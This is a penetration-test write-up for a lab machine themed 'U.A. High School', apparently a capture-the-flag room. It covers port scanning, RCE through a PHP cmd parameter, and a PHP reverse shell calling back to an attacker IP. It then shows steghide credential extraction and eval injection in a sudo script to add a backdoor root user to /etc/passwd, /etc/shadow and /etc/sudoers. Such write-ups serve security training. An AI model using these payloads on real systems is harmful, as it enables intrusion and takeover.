Skip to main content

U.A. High School

This report details the findings of a penetration test conducted against a target system representing U.A. High School's network infrastructure. The test successfully identified multiple vulnerabilities, leading to full system compromise (root access). The vulnerabilities exploited included:

  1. Remote Code Execution (RCE) via PHP index.php: A vulnerable PHP script allowed arbitrary command execution.
  2. Steganography: Hidden data within an image file revealed user credentials.
  3. Insecure Script Permissions and eval command abuse: A poorly configured script with sudo privileges allowed for privilege escalation to root.

The penetration test followed a standard methodology:

  1. Reconnaissance: Gathering information about the target.
  2. Scanning: Identifying open ports and services.
  3. Enumeration: Probing services for vulnerabilities and information.
  4. Exploitation: Gaining initial access using discovered vulnerabilities.
  5. Privilege Escalation: Elevating privileges to gain higher-level access.
  6. Post-Exploitation: Maintain access and reach the main objective.

1. Reconnaissance and Scanning

  • Target Identification: The target IP address was identified as 10.10.252.176.

  • Port Scanning (Nmap): A comprehensive port scan using nmap revealed the following open ports:

    export TARGET_IP=10.10.252.176
    nmap -p- --min-rate 5000 $TARGET_IP

    Output:

    Not shown: 65325 closed tcp ports (reset), 208 filtered tcp ports (no-response)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http

2. Web Application Enumeration

  • Directory Brute-Forcing (Feroxbuster): We used feroxbuster to discover hidden directories and files on the web server.

    feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php,html
    • Key Finding: The scan revealed an interesting file: /assets/index.php.

3. Exploiting Remote Code Execution (RCE)

  • Vulnerability Analysis: Accessing http://10.10.252.176/assets/index.php?cmd=id resulted in a Base64 encoded string. Decoding this string revealed the output of the id command, confirming Remote Code Execution (RCE).

    echo dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK | base64 --decode
    # Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • Exploitation (Reverse Shell): A reverse shell was established using a PHP one-liner (php -r '$sock=fsockopen("10.2.17.44",6666);exec("sh <&3 >&3 2>&3");') generated from revshells.com. This one-liner, when executed on the target, connects back to the attacker's machine.

    • Attacker Machine (Setup): Start a netcat listener: 
      nc -lvnp 6666
    • Target Machine (Exploit): Send the URL-encoded reverse shell payload: 
      http://10.10.252.176/assets/index.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.2.17.44%22%2C6666%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
    • Result: A shell was obtained as the www-data user.

4. File Analysis and Steganography

  • File Enumeration: Within the webroot, two image files were found: yuei.jpg and oneforall.jpg. The file command revealed that oneforall.jpg was misidentified as data.

    file ./images/oneforall.jpg  # Output: oneforall.jpg: data
    file ./images/yuei.jpg    # Output: yuei.jpg: JPEG image data, ...

  • File Transfer: The suspicious oneforall.jpg file was transferred to the attacker's machine for further analysis.

    Target Machine
    python3 -m http.server 8000
    Attacker Machine
    wget http://$TARGET_IP:8000/images/oneforall.jpg

  • Header Correction: The file header was incorrect (identified as PNG data). It was manually corrected to a valid JFIF (JPEG) header using hexedit and printf. This is a crucial step for steganography tools to work correctly.

    printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00' | dd of=oneforall.jpg bs=1 count=20 conv=notrunc
    file oneforall.jpg #Now it will be recognized.
    xdg-open oneforall.jpg # Also be able to see it

  • Explanation of the JFIF header: The provided printf command constructs a minimal, valid JFIF header. This is essential because steganography tools often check for valid file headers before attempting to extract data.

  • You can manually change the header using hexedit: FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 00 01 00 00 (you can ask an AI chat what each hex means).

  • Steganography Extraction (Steghide):

    • A password file was located in the /var/www/Hidden_Content directory.
    cat /var/www/Hidden_Content/passphrase.txt # QWxsbWlnaHRGb3JFdmVyISEhCg==
    echo QWxsbWlnaHRGb3JFdmVyISEhCg== | base64 --decode # AllmightForEver!!!
    • The base64 decoded string (AllmightForEver!!!) was used as a password to extract data.
    steghide extract -sf oneforall.jpg
    # Enter passphrase: AllmightForEver!!!
    cat creds.txt  # Output: deku:One?For?All_!!one1/A

  • Credential Discovery: The extracted data (creds.txt) contained the username deku and a corresponding password.

5. Privilege Escalation

  • SSH Login: The discovered credentials were used to log in to the target system via SSH.

    ssh deku@$TARGET_IP
    # Password: One?For?All_!!one1/A

  • Sudo Rights Enumeration: The sudo -l command was used to check the user's sudo privileges.

    sudo -l
    # Output: (ALL) /opt/NewComponent/feedback.sh

    This shows that the deku user can run /opt/NewComponent/feedback.sh as root.

  • Vulnerable Script Analysis: The feedback.sh script was examined. It takes user input and uses eval to echo it, creating a command injection vulnerability. The script attempts to filter some special characters, but the filtering is insufficient.

    cat /opt/NewComponent/feedback.sh
    #!/bin/bash
    echo "Enter your feedback:"
    read feedback

    if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
        echo "It is This:"
        eval "echo $feedback"
        echo "$feedback" >> /var/log/feedback.txt
        echo "Feedback successfully saved."
    else
        echo "Invalid input. Please provide a valid input."
    fi

  • Exploitation (Adding a Root User): The eval vulnerability was exploited to add a new user (b0end) to the /etc/passwd and /etc/shadow files, effectively creating a root-privileged account. The openssl was used for generate the password hash.

    First create the user

    sudo /opt/NewComponent/feedback.sh
    # "b0end:x:7777:7777:b0end:/home/b0end:/bin/bash" >> /etc/passwd

    Second, get a hashed password

    openssl passwd -crypt Aav3r15tr0ngpaSS # Replace with a strong password. Output example: JBAiFDzIQqipE

    Third, add it to shadow file.

    sudo /opt/NewComponent/feedback.sh
    # "b0end:JBAiFDzIQqipE:0:0:99999:7:::" >> /etc/shadow

    Fourth add the user to sudoers file.

      sudo /opt/NewComponent/feedback.sh
      # b0end ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers

  • Root Shell: The newly created user was used to gain a root shell.

    su b0end
    # [Enter the password you set]
    sudo su
    id  # Output: uid=0(root) gid=0(root) groups=0(root)